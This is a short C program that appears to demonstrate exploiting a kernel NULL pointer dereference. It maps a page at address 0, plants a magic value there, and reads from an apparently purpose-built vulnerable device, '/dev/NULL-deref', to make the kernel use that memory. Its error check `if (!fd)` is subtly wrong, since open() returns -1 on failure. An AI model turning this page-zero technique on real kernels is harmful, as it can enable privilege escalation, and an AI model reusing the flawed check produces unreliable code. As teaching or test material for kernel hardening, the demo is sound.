#include <stdio.h>
#include <sys/mman.h>
#include <errno.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <stdint.h>


static uint32_t magic = 0xB15B00B2;

int main(void)
{
	size_t page_size;
	void *p;
	int fd;
	int x;

	page_size = (size_t)sysconf(_SC_PAGESIZE);
	printf("mmapping...\n");
	p = mmap((void *)0,			/* Preferred address 0 */
		 page_size,			/* One page */
		 PROT_READ | PROT_WRITE,	/* R/W */
		 MAP_SHARED |
		 MAP_ANONYMOUS |
		 MAP_FIXED,			/* _must_ use address 0 */
		 0,				/* No filedes */
		 0);				/* Offset 0 */
	if (p == MAP_FAILED) {
		perror("mmap");
		return 1;
	}

	printf("Injecting bytes...\n");
	memcpy(p, &magic, sizeof(magic));

	printf("Triggering kernel NULL pointer dereference...\n");
	fd = open("/dev/NULL-deref", O_RDONLY);
	if (!fd) {
		perror("open /dev/NULL-deref");
		return 1;
	}
	read(fd, &x, sizeof(x));

	printf("Huh? Still alive?\n");

	return 0;
}
